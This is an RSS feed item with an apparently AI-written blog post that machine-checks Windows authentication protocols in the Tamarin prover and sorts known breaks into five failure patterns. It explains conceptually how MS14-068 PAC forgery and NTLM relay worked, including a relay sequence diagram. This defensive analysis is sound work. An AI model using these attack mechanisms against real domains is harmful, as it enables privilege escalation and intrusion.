<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Parag Mali</title><description>AI-authored deep dives on Windows security, endpoint protection, and supply-chain attacks - written by a multi-agent pipeline I designed and operate.</description><link>https://paragmali.com/</link><language>en-US</language><lastBuildDate>Thu, 18 Jun 2026 02:11:02 GMT</lastBuildDate><atom:link href="https://paragmali.com/rss.xml" rel="self" type="application/rss+xml"/><item><title>Five Ways Windows Authentication Breaks: A Machine-Checked Tour -- and Why Finding Nothing New Is the Point</title><link>https://paragmali.com/blog/five-ways-windows-authentication-breaks-a-machine-checked-to/</link><guid isPermaLink="true">https://paragmali.com/blog/five-ways-windows-authentication-breaks-a-machine-checked-to/</guid><description>A Tamarin and Dolev-Yao tour of 23 Windows authentication protocols: five recurring failure patterns, what a prover can prove, and the boundary it cannot cross.</description><pubDate>Fri, 12 Jun 2026 00:00:00 GMT</pubDate><content:encoded>
Twenty-three Windows `[MS-*]` authentication protocols, machine-checked in the Tamarin prover under one network (&quot;Dolev-Yao&quot;) adversary, each as a flawed/fixed pair reproducing a known, published break -- turned up **zero new vulnerabilities**. That is the point. Nearly every Windows-auth failure within symbolic reach collapses into **five recurring structural patterns**: missing channel binding, keyed-vs-unkeyed integrity, symmetric-credential reflection, identity-binding gaps, and delegation or composition failure. Deepening the models proved *positive* guarantees too -- forward secrecy and key-compromise-impersonation resistance for PKINIT-DH and IKE, hybrid post-quantum transcript binding, Silver-Ticket containment. The catch, and the honest core, is the **symbolic/computational boundary**: a perfect-crypto model sees protocol *logic*, not the probabilistic flaws (like Zerologon&apos;s zero-IV) that live one layer down.
&lt;h2&gt;1. Was Kerberos Broken, or Did It Just Look Broken?&lt;/h2&gt;
&lt;p&gt;In 2014, a domain user could become a domain administrator by changing a single field in a &lt;a href=&quot;https://paragmali.com/blog/kerberos-in-windows-the-other-half-of-ntlmless/&quot; rel=&quot;noopener&quot;&gt;Kerberos ticket&lt;/a&gt; [@cve-2014-6324]. Not by breaking any cryptography. The attacker built a Privilege Attribute Certificate that claimed membership in the administrators group, signed it with a checksum that needed no secret key, and handed it to the domain controller. The controller checked the signature, found it valid, read the forged groups, and issued back a ticket carrying full administrative authority [@cve-2014-6324]. Microsoft shipped MS14-068, the hole closed, and the penetration testers moved on [@ms14-068].&lt;/p&gt;

A signed data structure that Kerberos carries inside a ticket to tell a service who you are and which groups you belong to. Windows trusts the PAC for authorization decisions, so anyone who can forge a PAC the server will accept can rewrite their own group memberships [@ms-pac].
&lt;p&gt;The patch fixed the bug. It never answered the question underneath it: was Kerberos &lt;em&gt;broken&lt;/em&gt;, or did it just &lt;em&gt;look&lt;/em&gt; broken? The whole escalation turned on one mechanism -- whether the controller demanded a &lt;em&gt;keyed&lt;/em&gt; signature or accepted an &lt;em&gt;unkeyed&lt;/em&gt; checksum. Flip that one switch and the verdict flips with it.&lt;/p&gt;

flowchart TD
    A[User submits a ticket request with a self-made PAC] --&amp;gt; B{&quot;Does the KDC require a keyed signature on the PAC?&quot;}
    B --&amp;gt;|&quot;No, pre-patch&quot;| C[Unkeyed checksum, recomputable by anyone]
    C --&amp;gt; D[Forged group memberships accepted]
    D --&amp;gt; E[User gains domain administrator authority]
    B --&amp;gt;|&quot;Yes, MS14-068 fix&quot;| F[Forged PAC fails verification]
    F --&amp;gt; G[Request rejected, privileges unchanged]
&lt;p&gt;Windows runs dozens of authentication protocols, each specified in a Microsoft &lt;code&gt;[MS-*]&lt;/code&gt; open specification and each broken, at some point, by its own published CVE. The bulletin recorded MS14-068 only as a privately reported vulnerability and named no discoverer.The widely repeated attribution to Tom Maddock is community folklore, not a vendor confirmation; the bulletin itself says only &quot;privately reported&quot; [@ms14-068]. So here is the question this article answers. I took 23 of those &lt;code&gt;[MS-*]&lt;/code&gt; protocols and machine-checked them in the Tamarin prover under one network attacker, each modeled as a flawed version that reproduces its real break and a fixed version that closes it. The result was zero new vulnerabilities -- and that is the finding worth your time.&lt;/p&gt;
&lt;p&gt;Three claims, in order. First, the analysis surfaced nothing new: every break it exhibits was already published. Second, nearly every one of those breaks, across protocols that share no code, collapses into just &lt;strong&gt;five recurring structural patterns&lt;/strong&gt;. Third, finding nothing new across a corpus this well-studied is not an anticlimax -- it is the evidence that the five patterns are real and that the protocols, within the model, behave as their specifications claim.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; This is a tour of protocol &lt;em&gt;logic&lt;/em&gt; -- the failures a symbolic model can see. It does not cover offline password cracking, credential theft, or stolen-key attacks. Those live one layer down, and Section 9 explains exactly why a perfect-crypto model is blind to them.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;By the end you will have a vocabulary that predicts where an authentication protocol is likely to break before you have read a line of its CVE history. To explain why finding nothing can be a finding, though, we have to back up four decades -- to the first time a machine found a break that every human had missed.&lt;/p&gt;
&lt;h2&gt;2. Why Anyone Models Protocols at All&lt;/h2&gt;
&lt;p&gt;The Needham-Schroeder public-key protocol was published in 1978 and taught as correct for seventeen years [@needham-schroeder].Lowe&apos;s &lt;em&gt;first&lt;/em&gt; attack appeared in 1995 -- seventeen years after the 1978 publication -- with the model-checked break-and-fix following in 1996 [@lowe-nsfdr-ps]. The protocol was used, taught, and trusted the entire time -- which is precisely why a machine-checkable method, rather than careful reading, turned out to matter. Then Gavin Lowe pointed a model checker at it and the tool found a man-in-the-middle in an afternoon: an attacker can interleave two runs so that the responder completes believing it authenticated the initiator, when it actually ran with the attacker [@lowe-nsfdr-ps]. The attack had been sitting in plain sight the whole time. How did we get a machine that could find what a generation of careful readers had missed?&lt;/p&gt;
&lt;p&gt;The answer is a forty-year lineage, and it starts with a precise definition of the enemy. Needham and Schroeder gave the field its genre -- the challenge-response authentication handshake -- and, with it, a habit of arguing informally that a protocol &quot;obviously&quot; works [@needham-schroeder]. Five years later Danny Dolev and Andrew Yao replaced the hand-waving with a model so pessimistic it became the foundation of everything after it [@dolev-yao-ieee].&lt;/p&gt;

The attacker *is* the network. It can read, drop, replay, reorder, and inject any message; it can start any number of sessions; and it composes honest parties however it likes. The one thing it cannot do is break cryptography, which the model treats as perfect: ciphertext reveals nothing without the key, and signatures cannot be forged. Security means holding against this worst-case network attacker [@dolev-yao-ieee].
&lt;p&gt;That single abstraction is the load-bearing assumption behind every result in this article, and behind its central limitation. By assuming perfect cryptography, the Dolev-Yao model throws away the bit-level details so it can reason cleanly about message flow -- which is exactly why it sees logic flaws and misses arithmetic ones.&lt;/p&gt;

Symbolic analysis models messages as abstract terms and assumes cryptography is perfect, so it reasons about protocol *logic* under a Dolev-Yao attacker. Computational analysis models messages as bitstrings and the attacker as a probabilistic polynomial-time algorithm, so it reasons about *probabilities*, key sizes, and the strength of primitives. The two methods answer different questions and see different failures [@sok-cac].
&lt;p&gt;Next came a tool to reason inside the model. Burrows, Abadi, and Needham published BAN logic in 1990, a belief calculus that let analysts write down what each party is entitled to conclude from the messages it sees, layered on top of the Dolev-Yao attacker rather than inventing it [@ban-logic]. BAN made formal reasoning usable. It also showed how a verification method can be confidently wrong.&lt;/p&gt;

In 1990 Dan Nessett published a protocol that BAN logic &quot;proves&quot; secure even though it transmits the session key signed under a private key, so anyone with the corresponding public key can recover it -- the key is effectively in the clear [@nessett]. The lesson is not that BAN was useless; it is that a proof inherits the blind spots of its model. The same caution governs everything a symbolic prover tells us today.
&lt;p&gt;Then the machines arrived. Lowe&apos;s 1996 break used the FDR refinement checker, and his paper did something subtle that turned out to matter for decades: it did not just break the protocol, it &lt;em&gt;fixed&lt;/em&gt; it and re-checked the repair [@lowe-nsfdr-ps]. Break, patch, prove the patch -- that loop is the direct ancestor of the method in this article. Automated provers followed, in two families ordered by power rather than by date. Lowe&apos;s FDR sits at the head of the bounded, finite-state lineage -- explore every protocol run up to a fixed size -- a line later consolidated into toolsets such as AVISPA in 2005 [@avispa]. The unbounded symbolic provers, which lift that ceiling to arbitrarily many sessions, were led by ProVerif in 2001 [@blanchet-proverif] and eventually Tamarin in 2013 [@tamarin-cav].The split is conceptual, not a timeline: AVISPA (CAV 2005) [@avispa] postdates ProVerif (CSFW 2001) [@blanchet-proverif] by four years, and the genuinely earlier bounded exemplar is Lowe&apos;s FDR in 1996 [@lowe-nsfdr-ps].&lt;/p&gt;

Machines find what intuition misses. Lowe&apos;s 1996 result was not a cleverer human reading; it was a tool exploring runs a human would never enumerate by hand.
&lt;p&gt;While that method matured, a second, separate history was unfolding inside Windows. The protocols Kerberos, NTLM, CredSSP, LDAP, and their relatives were each specified in a Microsoft &lt;code&gt;[MS-*]&lt;/code&gt; document [@ms-nlmp] [@ms-pac] and each broken, in turn, by its own CVE across more than twenty years -- the breaks Section 4 lays out end to end. The two lineages -- method and application -- ran side by side and barely touched.&lt;/p&gt;

flowchart LR
    subgraph M[&quot;Method lineage&quot;]
      M1[Needham-Schroeder 1978] --&amp;gt; M2[Dolev-Yao adversary 1983]
      M2 --&amp;gt; M3[BAN belief logic 1990]
      M3 --&amp;gt; M4[Lowe and FDR model checker 1996]
      M4 --&amp;gt; M5[Unbounded provers, ProVerif 2001]
      M5 --&amp;gt; M6[Tamarin 2013]
    end
    subgraph A[&quot;Windows application lineage&quot;]
      A1[SMBRelay 2001] --&amp;gt; A2[MS08-068 2008]
      A2 --&amp;gt; A3[MS14-068 2014]
      A3 --&amp;gt; A4[Relay family 2017-2019]
      A4 --&amp;gt; A5[Bronze Bit 2020 and Certifried 2022]
    end
    M6 --&amp;gt; C[One adversary, whole corpus]
    A5 --&amp;gt; C
&lt;p&gt;Lowe broke one protocol and fixed it. The Windows world had dozens, and for two decades each one was broken, and patched, entirely on its own. The first people to point the new machines at these specific protocols could say something rigorous about each -- but only one at a time.&lt;/p&gt;
&lt;h2&gt;3. One Protocol at a Time&lt;/h2&gt;
&lt;p&gt;The machines did get pointed at the protocols Windows actually runs, and the early results were genuinely good. They were also, by construction, local.&lt;/p&gt;
&lt;p&gt;Start with public-key Kerberos. PKINIT lets a client authenticate to the Key Distribution Center with a certificate instead of a password, extending the Kerberos V5 service defined in RFC 4120 [@rfc4120].PKINIT is the public-key front door to Kerberos: it is how smart-card logon [@ms-pkca] and Windows Hello for Business [@whfb-auth] get an initial ticket. In 2006, Cervesato, Jaggard, Scedrov, Tsay, and Walstad formally analyzed it and found a man-in-the-middle: the KDC&apos;s reply was not bound to the requesting client&apos;s identity, so an insider could sit between a client and the KDC and make the client accept a session it never established [@cjstw-eprint]. They did not stop at the break. They specified fixes that bind the reply to the client and machine-checked the repair [@cjstw-asian], with the canonical journal version following in 2008 [@cjstw-infcomput]. Break, fix, prove the fix -- Lowe&apos;s loop, applied to a protocol shipping in every enterprise.&lt;/p&gt;
&lt;p&gt;Two years later, in 2008, Armando, Carbone, Compagna, Cuellar, and Tobarra turned the same lens on SAML 2.0 web-browser single sign-on, the protocol family behind federated login. A missing binding between an assertion and its intended audience let a dishonest service provider redirect a user&apos;s authentication to a different one, breaking SSO for Google Apps as their worked example [@armando-saml]. A few years later Cas Cremers re-analyzed IPsec&apos;s IKEv1 and IKEv2 and showed cross-mode confusion: properties that hold for one authentication mode can fail once an attacker mixes modes the designers reasoned about separately [@cremers-ipsec].&lt;/p&gt;
&lt;p&gt;Underneath two of those results sat one idea that had already been named. In 2003, Asokan, Niemi, and Nyberg described the man-in-the-middle in tunnelled authentication protocols: when an inner authentication runs inside an outer protected channel without being bound to it, an attacker can relay the inner exchange through a channel of its own choosing [@asokan-spw-doi]. Their fix was a cryptographic binding between the inner authentication and the protection protocol [@asokan-eprint] -- the academic root of what Windows would later call channel binding, and the seed of the first of our five patterns.&lt;/p&gt;
&lt;p&gt;Each of these was rigorous. Each shipped a real fix that is still in the specifications today. But notice the shape of the work: every analysis built its &lt;em&gt;own&lt;/em&gt; model of the attacker, its own idealization of the protocol, its own security goals. PKINIT&apos;s adversary was not SAML&apos;s adversary, which was not IKE&apos;s. So when a practitioner squinted and said &quot;these all feel like the same mistake,&quot; that intuition had nowhere rigorous to land. The recurrence was an analogy across papers that did not share a model.&lt;/p&gt;
&lt;p&gt;That is the wall the rest of this article is built to climb. Every one of these was a verdict on a single protocol. Nobody had asked, in a checkable way, what the breaks had in common -- because with a different model under each one, nobody could.&lt;/p&gt;
&lt;h2&gt;4. Twenty Years, the Same Five Mistakes&lt;/h2&gt;
&lt;p&gt;Lay the famous Windows-auth breaks end to end and a shape jumps off the page. SMBRelay in 2001, NTLM credential reflection in 2008, the unkeyed Kerberos checksum in 2014, a cluster of relay and channel-binding failures from 2017 to 2019, the Bronze Bit delegation bypass in 2020, the Certifried certificate misissuance in 2022. Different teams, different protocols, different decades -- and a small number of mistakes underneath, repeating.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Public break&lt;/th&gt;
&lt;th&gt;Protocol&lt;/th&gt;
&lt;th&gt;The mechanism that failed&lt;/th&gt;
&lt;th&gt;Pattern&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;2001&lt;/td&gt;
&lt;td&gt;SMBRelay [@cdc-smbrelay]&lt;/td&gt;
&lt;td&gt;SMB / NTLM&lt;/td&gt;
&lt;td&gt;authenticator not bound to the channel it was used on&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2008&lt;/td&gt;
&lt;td&gt;MS08-068, CVE-2008-4037 [@ms08-068]&lt;/td&gt;
&lt;td&gt;NTLM (SMB)&lt;/td&gt;
&lt;td&gt;a credential reflected straight back at its sender&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2014&lt;/td&gt;
&lt;td&gt;MS14-068, CVE-2014-6324 [@cve-2014-6324]&lt;/td&gt;
&lt;td&gt;Kerberos PAC&lt;/td&gt;
&lt;td&gt;an unkeyed checksum accepted where a keyed signature was required&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2017&lt;/td&gt;
&lt;td&gt;CVE-2017-8563 [@cve-2017-8563]&lt;/td&gt;
&lt;td&gt;LDAP&lt;/td&gt;
&lt;td&gt;the bind not bound to the TLS channel underneath it&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2018&lt;/td&gt;
&lt;td&gt;CVE-2018-0886 [@cve-2018-0886]&lt;/td&gt;
&lt;td&gt;CredSSP&lt;/td&gt;
&lt;td&gt;the key-authentication value not bound to the TLS session&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2019&lt;/td&gt;
&lt;td&gt;CVE-2019-1040 [@cve-2019-1040]&lt;/td&gt;
&lt;td&gt;NTLM&lt;/td&gt;
&lt;td&gt;an integrity field stripped without invalidating the signature&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2020&lt;/td&gt;
&lt;td&gt;CVE-2020-17049 (Bronze Bit) [@cve-2020-17049]&lt;/td&gt;
&lt;td&gt;Kerberos S4U&lt;/td&gt;
&lt;td&gt;a delegation restriction not protected by a keyed signature&lt;/td&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2022&lt;/td&gt;
&lt;td&gt;CVE-2022-26923 (Certifried) [@cve-2022-26923]&lt;/td&gt;
&lt;td&gt;AD CS&lt;/td&gt;
&lt;td&gt;a certificate subject not bound to the requester&apos;s identity&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The first entry is the oldest and the least formal. SMBRelay was demonstrated by the handle Sir Dystic in 2001, and its provenance is an archived Cult of the Dead Cow page rather than an academic paper [@cdc-smbrelay].That archival fragility is itself worth noting: a foundational attack in Windows security history survives mainly as a web-archive snapshot, not a citable primary [@cdc-smbrelay]. It showed that an NTLM authenticator, captured on one connection, could be forwarded to a second service that would happily accept it.&lt;/p&gt;

timeline
    title Windows authentication breaks, 2001-2022
    2001 : SMBRelay, NTLM relayed to a second service
    2008 : MS08-068, NTLM credential reflection
    2014 : MS14-068, unkeyed PAC checksum forged
    2017 : CVE-2017-8563, LDAP bind unbound from TLS
    2018 : CVE-2018-0886, CredSSP TLS splice
    2019 : CVE-2019-1040, drop-the-MIC integrity strip
    2020 : CVE-2020-17049, Bronze Bit delegation bypass
    2022 : CVE-2022-26923, Certifried misissuance
&lt;p&gt;Every one of these got a fix, and every fix was sound. Channel binding closed the relay and tunnelling failures, formalized for TLS as the bindings in RFC 5929 [@rfc5929]. Requiring a keyed signature closed the forged-PAC escalation [@cve-2014-6324]. Detecting and rejecting a reflected authenticator stopped NTLM credential reflection: MS08-068 changed the way SMB validates authentication replies, so a credential bounced straight back at its sender no longer passes [@ms08-068]. Binding an issued token to its audience and its requester closed the misissuance and redirection failures [@cve-2022-26923]. Protecting a delegation flag with a key closed the Bronze Bit bypass [@cve-2020-17049]. Each repair was correct, shipped quickly, and -- this is the important part -- entirely local to its own protocol.&lt;/p&gt;
&lt;p&gt;That locality is the trap. NTLM reflection [@ms08-068] and the unkeyed PAC checksum [@cve-2014-6324] are the same family of mistake -- trusting an integrity value that carries no secret or no direction -- yet they live in protocols that share no code and were fixed years apart by different teams. The relay family of 2017 through 2019 [@cve-2017-8563] [@cve-2018-0886] [@cve-2019-1040] is one idea, missing channel binding, wearing three protocol costumes. Bronze Bit [@cve-2020-17049] and Certifried [@cve-2022-26923] rhyme with breaks a decade older. The pattern is real, but it is spread across the seams between protocols, exactly where per-protocol work cannot look.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Per-CVE point-fixing is indispensable engineering and a terrible microscope for structure. Each patch is local to one protocol, and each one-protocol analysis rebuilds the attacker model from scratch. So the recurring shape is invisible by construction: you cannot see a cross-protocol pattern one protocol at a time. The fixes were never wrong -- they were just the wrong instrument for the question &quot;what keeps going wrong?&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Which sets up the move the rest of the article depends on. If the shapes are real, you should be able to &lt;em&gt;prove&lt;/em&gt; they are real -- not protocol by protocol, but all of them at once, every model facing the same attacker, with the recurrence stated as a checkable claim rather than a feeling. What would it take to build that?&lt;/p&gt;
&lt;h2&gt;5. One Adversary, One Method, the Whole Corpus&lt;/h2&gt;
&lt;p&gt;The move that makes the recurrence checkable is almost embarrassingly simple to state: model 23 of the &lt;code&gt;[MS-*]&lt;/code&gt; protocols in a single prover, under one shared attacker, and for each known break build not two models but three. I used the Tamarin prover for this, and its feature list is the reason [@tamarin-cav].&lt;/p&gt;
&lt;p&gt;Tamarin represents a protocol as multiset-rewriting rules over a mutable global state, reasons natively about Diffie-Hellman exponentiation, and verifies properties over an &lt;em&gt;unbounded&lt;/em&gt; number of sessions rather than a fixed few [@tamarin-cav]. It produces both proofs and concrete attack traces, and it has been used on protocols at the scale of TLS 1.3, 5G-AKA, and EMV [@tamarin-home]. Windows authentication needs exactly that combination: key exchange with real DH and &lt;a href=&quot;https://paragmali.com/blog/post-quantum-cryptography-on-windows-the-thirty-year-migrati/&quot; rel=&quot;noopener&quot;&gt;post-quantum KEMs&lt;/a&gt;, credential state that changes as tickets are issued, unbounded concurrent sessions, and the ability to show &lt;em&gt;both&lt;/em&gt; that a fix works and that the flawed version breaks. Security goals are written as trace properties.&lt;/p&gt;

A security goal phrased as a statement about every possible run of the protocol: on no trace does something bad happen. Secrecy says no run ever leaks the secret to the attacker. Agreement says that whenever one party finishes believing it authenticated another, that other party really did take part in a matching run [@tamarin-manual].

Agreement strengthened with a one-to-one matching between a party&apos;s completed runs and its peer&apos;s genuine runs, so that no single legitimate exchange can be replayed to satisfy two separate acceptances. Injectivity is the part of the property that rules out replay [@tamarin-manual].
&lt;p&gt;The third model is the one that turns analogy into evidence.&lt;/p&gt;

Three models of the same protocol. The *fixed* model includes the defended mechanism and verifies the security lemma. The *flawed* model removes exactly that one mechanism, and the same lemma falsifies -- reproducing the published break. The *control* re-enables the mechanism and the lemma verifies again. Because only one thing changed between the three, the cause of the break is pinned to that mechanism rather than to some accident of how the model was written [@lowe-nsfdr-ps].
&lt;p&gt;Here is one lemma, in Tamarin&apos;s own property language, for the MS14-068 case -- the claim that only the KDC can produce a PAC a server will accept:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;lemma pac_only_kdc_can_sign:
  &quot;All srv pac #i.
       AcceptPAC(srv, pac) @i
   ==&amp;gt; ( Ex #j. KdcSignedPAC(pac) @j &amp;amp; j &amp;lt; i )
     | ( Ex #r. RevealKey(&apos;krbtgt&apos;) @r )&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Read it as: on every trace, if a server accepts a PAC at time &lt;code&gt;i&lt;/code&gt;, then either the KDC actually produced that PAC&apos;s keyed signature earlier, or the long-term &lt;code&gt;krbtgt&lt;/code&gt; key was revealed [@tamarin-manual]. In the fixed model, where the integrity check is a keyed signature under &lt;code&gt;krbtgt&lt;/code&gt;, Tamarin finds no violating trace and the lemma holds for unbounded sessions. In the flawed model, where the server accepts an unkeyed checksum, Tamarin returns a concrete counterexample -- an acceptance with no prior KDC signature and no key reveal -- which is the forged-PAC escalation, machine-checked [@cve-2014-6324]. The operators and templates are standard Tamarin; the action-fact names are the model&apos;s own and are not themselves a citable claim.&lt;/p&gt;
&lt;p&gt;Two disciplines keep this honest. The first guards against a lemma that is true only because nothing ever reaches it.A property can be vacuously satisfied if no honest run ever triggers its premise. Non-vacuity sanity lemmas prove an honest party really can complete the protocol, so a &quot;verified&quot; guarantee has teeth rather than being true by absence [@tamarin-manual]. The second guards against overclaiming: every falsification is matched to a published CVE or paper before I call it a reproduction. Nothing in this corpus is presented as a discovery.&lt;/p&gt;

flowchart TD
    P[One protocol, one Dolev-Yao adversary] --&amp;gt; F[Fixed model, mechanism present]
    P --&amp;gt; X[Flawed model, one mechanism removed]
    P --&amp;gt; K[Control model, mechanism re-enabled]
    F --&amp;gt; FR[Security lemma verifies]
    X --&amp;gt; XR[Same lemma falsifies, the published break]
    K --&amp;gt; KR[Same lemma verifies again]
    FR --&amp;gt; D{&quot;Did only the toggled mechanism move the verdict?&quot;}
    XR --&amp;gt; D
    KR --&amp;gt; D
    D --&amp;gt;|Yes| C[Cause localized to the mechanism, not the harness]
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The control model is the difference between a story and a proof. Without it, &quot;these breaks are all the same pattern&quot; is a nice grouping of war stories. With it, the claim becomes machine-checked and specific: toggle this one mechanism and the security property flips, restore it and the property returns. The recurrence is no longer an analogy across papers -- it is a falsifiable statement about a mechanism, repeated across protocols that share no code.&lt;/p&gt;
&lt;/blockquote&gt;

Finding nothing new across a well-studied corpus is not a null result. It is the evidence that the taxonomy is real -- the protocols behave, within the model, exactly as their fixes claim.
&lt;p&gt;With the instrument built, the corpus gives up its structure without much further argument. There are five shapes. Here is each one, with the worked break behind it.&lt;/p&gt;
&lt;h2&gt;6. The Five Patterns&lt;/h2&gt;
&lt;p&gt;Before you read a single CVE, ask five questions of any authentication protocol. Each question targets one of the recurring shapes, and a &quot;no&quot; to any of them names the family of break to expect. This decision tree is the article&apos;s centerpiece -- the audit you can run from memory.&lt;/p&gt;

flowchart TD
    S[Any authentication protocol] --&amp;gt; Q1{&quot;Is every authenticator bound to the channel and endpoint it is used on?&quot;}
    Q1 --&amp;gt;|No| P1[Pattern 1, relay and MITM]
    Q1 --&amp;gt;|Yes| Q2{&quot;Is every integrity check keyed, never a bare checksum?&quot;}
    Q2 --&amp;gt;|No| P2[Pattern 2, keyed-vs-unkeyed confusion]
    Q2 --&amp;gt;|Yes| Q3{&quot;Does every symmetric credential carry a direction or role tag?&quot;}
    Q3 --&amp;gt;|No| P3[Pattern 3, credential reflection]
    Q3 --&amp;gt;|Yes| Q4{&quot;Does every signed token bind requester, key, and audience?&quot;}
    Q4 --&amp;gt;|No| P4[Pattern 4, identity-binding gap]
    Q4 --&amp;gt;|Yes| Q5{&quot;Does every delegation chain keep its restriction under composition?&quot;}
    Q5 --&amp;gt;|No| P5[Pattern 5, delegation and composition]
    Q5 --&amp;gt;|Yes| OK[No break in these five shapes within symbolic reach]
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Pattern&lt;/th&gt;
&lt;th&gt;The mechanism that fails&lt;/th&gt;
&lt;th&gt;Worked break&lt;/th&gt;
&lt;th&gt;The fix&lt;/th&gt;
&lt;th&gt;Public anchor&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;1. Channel binding&lt;/td&gt;
&lt;td&gt;authenticator not bound to its channel or endpoint&lt;/td&gt;
&lt;td&gt;NTLM relay, drop-the-MIC, CredSSP, LDAP&lt;/td&gt;
&lt;td&gt;TLS channel binding, SPNEGO mechListMIC&lt;/td&gt;
&lt;td&gt;[@rfc5929] [@cve-2019-1040]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2. Keyed-vs-unkeyed&lt;/td&gt;
&lt;td&gt;an unkeyed checksum accepted as integrity&lt;/td&gt;
&lt;td&gt;MS14-068 PAC forgery&lt;/td&gt;
&lt;td&gt;require a keyed KDC signature&lt;/td&gt;
&lt;td&gt;[@cve-2014-6324]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3. Reflection&lt;/td&gt;
&lt;td&gt;a symmetric credential with no direction tag&lt;/td&gt;
&lt;td&gt;NTLM credential reflection (MS08-068)&lt;/td&gt;
&lt;td&gt;reflection/replay detection (a direction tag in the model)&lt;/td&gt;
&lt;td&gt;[@ms08-068] [@cve-2008-4037]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4. Identity binding&lt;/td&gt;
&lt;td&gt;a token not bound to requester, key, or audience&lt;/td&gt;
&lt;td&gt;PKINIT, SAML SSO, Certifried&lt;/td&gt;
&lt;td&gt;bind reply, audience, and subject&lt;/td&gt;
&lt;td&gt;[@cve-2022-26923] [@rfc4556]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5. Delegation&lt;/td&gt;
&lt;td&gt;a restriction not preserved across a chain&lt;/td&gt;
&lt;td&gt;Bronze Bit S4U&lt;/td&gt;
&lt;td&gt;protect the flag with a keyed signature&lt;/td&gt;
&lt;td&gt;[@cve-2020-17049]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; These five questions are a predictive vocabulary. You do not need to formally model a protocol to ask them, and you do not need its CVE history. A &quot;no&quot; to any question tells you which family of failure to look for first -- which is what a taxonomy is for.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Pattern 1: Missing or ignored channel binding&lt;/h3&gt;
&lt;p&gt;The first pattern is the relay. An authenticator -- an NTLM response, a signed bind, a delegated credential -- is computed without naming the channel it is supposed to travel on, so an attacker can carry it to a different service that will accept it just the same. This is the modern form of the tunnelled-authentication man-in-the-middle that Asokan, Niemi, and Nyberg described in 2003 [@asokan-spw-doi].&lt;/p&gt;

Channel binding ties an inner authenticator to the outer channel it travels on, usually identified by the TLS endpoint [@rfc5929]. Windows ships it as Extended Protection for Authentication (EPA) and a Channel Binding Token (CBT) [@adv190023]. With the binding present, an authenticator captured on one connection is useless on another, because it names the channel it was made for.
&lt;p&gt;The worked model is &lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/&quot; rel=&quot;noopener&quot;&gt;NTLM&lt;/a&gt;. With no channel binding, a victim&apos;s NTLM exchange relays cleanly to a second service [@ms-nlmp]; add the binding and the relayed authenticator no longer matches the channel it arrives on, and the target rejects it.&lt;/p&gt;

sequenceDiagram
    participant V as Victim client
    participant M as Attacker relay
    participant T as Target server
    V-&amp;gt;&amp;gt;M: Connect, NTLM NEGOTIATE
    M-&amp;gt;&amp;gt;T: Relay NEGOTIATE as the victim
    T-&amp;gt;&amp;gt;M: NTLM CHALLENGE, server nonce
    M-&amp;gt;&amp;gt;V: Forward the same CHALLENGE
    V-&amp;gt;&amp;gt;M: NTLM AUTHENTICATE over the nonce
    M-&amp;gt;&amp;gt;T: Relay AUTHENTICATE unchanged
    Note over M,T: No channel binding, so the target cannot tell the response came from a different connection
    T-&amp;gt;&amp;gt;M: Access granted as the victim
